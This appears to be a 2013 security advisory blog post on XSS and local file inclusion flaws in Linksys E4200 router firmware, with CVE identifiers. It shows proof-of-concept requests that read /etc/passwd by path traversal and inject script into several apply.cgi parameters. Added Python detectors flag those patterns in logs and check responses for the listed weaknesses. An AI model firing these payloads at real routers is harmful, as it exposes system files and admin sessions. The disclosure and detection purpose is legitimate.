Anti-Phishing Research, Tombstones

Monday, May 6, 2013

XSS, LFI, Linksys E4200 Firmware, 0D


XSS, LFI in Cisco, Linksys E4200 Firmware

CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, CVE-2013-2683, CVE-2013-2684

Keywords

XSS, Cross Site Scripting, CWE-79, CAPEC-86, JavaScript Injection, Exploit, Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp

Credits

Summary

Reflected XSS and LFI bugs in the Cisco, Linksys E4200 Wireless Router firmware (Version 1.0.05 build 7) were discovered by our researchers in January 2013 and finally acknowledged by Linksys in April 2013. The vendor is unable to patch the vulnerability in a reasonable timeframe. This document introduces and discusses the vulnerability and provides Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10, released on July 9, 2012, and prior versions.

Overview

Linksys is a brand of home and small office networking products and a company founded in 1988, which was acquired by Cisco Systems in 2003. In 2013, as part of its push away from the consumer market, Cisco sold its home networking division and Linksys to Belkin. Former Linksys products are now branded as Linksys by Cisco.

Products currently and previously sold under the Linksys brand name include broadband and wireless routers, consumer and small business grade Ethernet switching, VoIP equipment, wireless internet video cameras, AV products, network storage systems, and other products.

Linksys products were widely available in North America off-the-shelf from consumer electronics stores (CompUSA and Best Buy), internet retailers, and big-box retail stores (WalMart). Linksys' significant competitors as an independent networking firm were D-Link and NetGear, the latter for a time being a brand of Cisco competitor Nortel.

Vendor Software

# Copyright (C) 2009, CyberTAN Corporation
# All Rights Reserved.
#
# THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF ANY
# KIND, EXPRESS OR IMPLIED, BY STATUTE.....

The Exploits

LFI PoC

POST /storage/apply.cgi HTTP/1.1
Host: my.vulnerable.e4500.firmware
Content-Type: application/x-www-form-urlencoded

submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd

LFI Results

XSS PoC

   /apply.cgi [log_type parameter]
   /apply.cgi [ping_ip parameter]
   /apply.cgi [ping_size parameter]
   /apply.cgi [submit_type parameter]
   /apply.cgi [traceroute_ip parameter]
   /storage/apply.cgi [new_workgroup parameter]
   /storage/apply.cgi [submit_button parameter]

POST /apply.cgi HTTP/1.1
…..

change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_type=&log_type=ilog14568"%3balert(1)//482

XSS Results

Other XSS PoCs

&ping_ip=a.b.c.ddb0'><script>alert(1)</script>9479e857331
&ping_size=32dd369'><script>alert(1)</script>71a6e17036a
&submit_type=start_traceroute10808'%3balert(1)//922
&traceroute_ip=a.b.c.df0db4"><script>alert(1)</script>0f8d07c59be
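For defenders who want to spot the two request-side issues above (the next_page traversal on /storage/apply.cgi and the reflected-XSS sinks on /apply.cgi) in their own router access logs, the following detector is an added example; it is not code from this advisory, from Linksys or from cyberTAN. The log line format (METHOD PATH "BODY") and the sample lines are constructed assumptions; the endpoint and parameter names come from the PoCs above.

```python
"""Flag E4200-style apply.cgi requests that carry a path-traversal or
script-injection payload.  Added example, not advisory or vendor code.
The log format and the sample lines below are constructed assumptions."""
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the advisory lists as reflected-XSS sinks, per endpoint.
XSS_PARAMS = {
    "/apply.cgi": {"log_type", "ping_ip", "ping_size", "submit_type", "traceroute_ip"},
    "/storage/apply.cgi": {"new_workgroup", "submit_button"},
}
# next_page on /storage/apply.cgi is the traversal sink (CVE-2013-2678).
TRAVERSAL_PARAMS = {"/storage/apply.cgi": {"next_page"}}

# Patterns matching the shapes seen in the PoCs: a script tag, an alert()
# call, or a quote that closes a JS string followed by a statement separator.
SCRIPT_RE = re.compile(r"""<\s*script|alert\s*\(|["']\s*;""", re.I)
# A "../" segment anywhere in the value, or a direct /etc/passwd reference.
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)|/etc/passwd", re.I)

# Constructed log format: METHOD TARGET "BODY" (body is the raw form data).
LOG_RE = re.compile(r'^(?P<method>\w+) (?P<target>\S+) "(?P<body>[^"]*)"$')


def findings_for(method, target, body):
    """Return a list of (endpoint, parameter, kind) tuples for one request."""
    parts = urlsplit(target)
    endpoint = parts.path
    # parse_qs percent-decodes, so %3b and %22 become ';' and '"' here.
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        for name, vals in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(name, []).extend(vals)
    found = []
    for name, values in params.items():
        for value in values:
            if name in TRAVERSAL_PARAMS.get(endpoint, ()) and TRAVERSAL_RE.search(value):
                found.append((endpoint, name, "path-traversal"))
            if name in XSS_PARAMS.get(endpoint, ()) and SCRIPT_RE.search(value):
                found.append((endpoint, name, "script-injection"))
    return found


def scan_log(lines):
    """Run findings_for over log lines; returns {line_no: findings} for hits only."""
    hits = {}
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not in the constructed format; skip
        f = findings_for(m["method"], m["target"], m["body"])
        if f:
            hits[n] = f
    return hits


# Constructed sample log: two benign requests, three shaped like the PoCs.
SAMPLE_LOG = [
    'GET /index.asp ""',
    'POST /storage/apply.cgi "submit_type=nas_admin&submit_button=NAS_Administration'
    '&change_action=gozila_cgi&next_page=../../../../etc/passwd"',
    'POST /apply.cgi "change_action=gozila_cgi&submit_button=Log_View'
    '&submit_type=undefined&log_type=&log_type=ilog14568%22%3balert(1)//482"',
    'POST /apply.cgi "submit_button=Diagnostics&ping_ip=192.0.2.1&ping_size=32"',
    'GET /apply.cgi?submit_type=start_traceroute%27%3balert(1)//922 ""',
]

if __name__ == "__main__":
    for line_no, findings in scan_log(SAMPLE_LOG).items():
        print(line_no, findings)
```

Only parameters the advisory names are inspected, so the noise from ordinary configuration posts stays low; widen XSS_PARAMS if your own testing turns up further sinks.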

CVE Information

Weakness                                   CVE
File path traversal                        CVE-2013-2678
Cross-site scripting (reflected)           CVE-2013-2679
Cleartext submission of password           CVE-2013-2680
Password field with autocomplete enabled   CVE-2013-2681
Frameable response (Clickjacking)          CVE-2013-2682
Private IP addresses disclosed             CVE-2013-2683
HTML does not specify charset              CVE-2013-2684

CVSS Version 2 Score = 4.5
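The five response-level issues in the list (CVE-2013-2680 through CVE-2013-2684) can be checked from a captured page response. The checker below is an added example, not code from this advisory or from the vendor; the sample response and its hardened counterpart are constructed, and the checks rely only on standard headers (Content-Type charset, X-Frame-Options) and the autocomplete attribute on password inputs.

```python
"""Check an HTTP response for the response-level weaknesses the advisory
lists (CVE-2013-2680 .. CVE-2013-2684).  Added example, not advisory or
vendor code; the sample response below is constructed."""
import re
from html.parser import HTMLParser

# RFC 1918 ranges, for the private-IP disclosure check.
PRIVATE_IP_RE = re.compile(
    r"\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}"
    r"|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}"
    r"|192\.168\.\d{1,3}\.\d{1,3})\b")


class _FormScanner(HTMLParser):
    """Collects password inputs together with the action of their form."""
    def __init__(self):
        super().__init__()
        self.form_action = None
        self.password_inputs = []  # (form action, autocomplete attr or None)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_action = (a.get("action") or "").strip()
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs.append((self.form_action, a.get("autocomplete")))

    def handle_endtag(self, tag):
        if tag == "form":
            self.form_action = None


def check_response(scheme, headers, body):
    """Return the set of weakness labels present.  `scheme` is the scheme the
    page was served over; `headers` maps lowercase header names to values."""
    weak = set()
    ctype = headers.get("content-type", "").lower()
    if "text/html" in ctype and "charset=" not in ctype:
        weak.add("CVE-2013-2684 HTML does not specify charset")
    # A CSP frame-ancestors directive would also do; this checks the header
    # that predates it.
    if "x-frame-options" not in headers:
        weak.add("CVE-2013-2682 Frameable response (Clickjacking)")
    if PRIVATE_IP_RE.search(body):
        weak.add("CVE-2013-2683 Private IP addresses disclosed")
    scanner = _FormScanner()
    scanner.feed(body)
    for action, autocomplete in scanner.password_inputs:
        if (autocomplete or "").lower() != "off":
            weak.add("CVE-2013-2681 Password field with autocomplete enabled")
        # A relative action submits over the scheme the page was loaded on.
        target = action if action.startswith(("http://", "https://")) else scheme + "://"
        if target.startswith("http://"):
            weak.add("CVE-2013-2680 Cleartext submission of password")
    return weak


# Constructed sample: an admin page as a router like this might serve it.
SAMPLE_HEADERS = {"content-type": "text/html", "server": "httpd"}
SAMPLE_BODY = """<html><body>
<form action="/apply.cgi" method="post">
  <input type="text" name="http_username">
  <input type="password" name="http_passwd">
</form>
<p>LAN: 192.168.1.1</p>
</body></html>"""

# The same page with each of the five issues addressed.
HARDENED_HEADERS = {"content-type": "text/html; charset=utf-8",
                    "x-frame-options": "DENY"}
HARDENED_BODY = (SAMPLE_BODY
                 .replace('type="password"', 'type="password" autocomplete="off"')
                 .replace("192.168.1.1", "the router"))

if __name__ == "__main__":
    for label in sorted(check_response("http", SAMPLE_HEADERS, SAMPLE_BODY)):
        print("weak:", label)
    print("hardened:", check_response("https", HARDENED_HEADERS, HARDENED_BODY))
```

Run against a response captured from the router's admin interface, the function reports which of the five items still apply; the hardened sample shows the minimal header and markup changes that clear all of them.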

Version Information
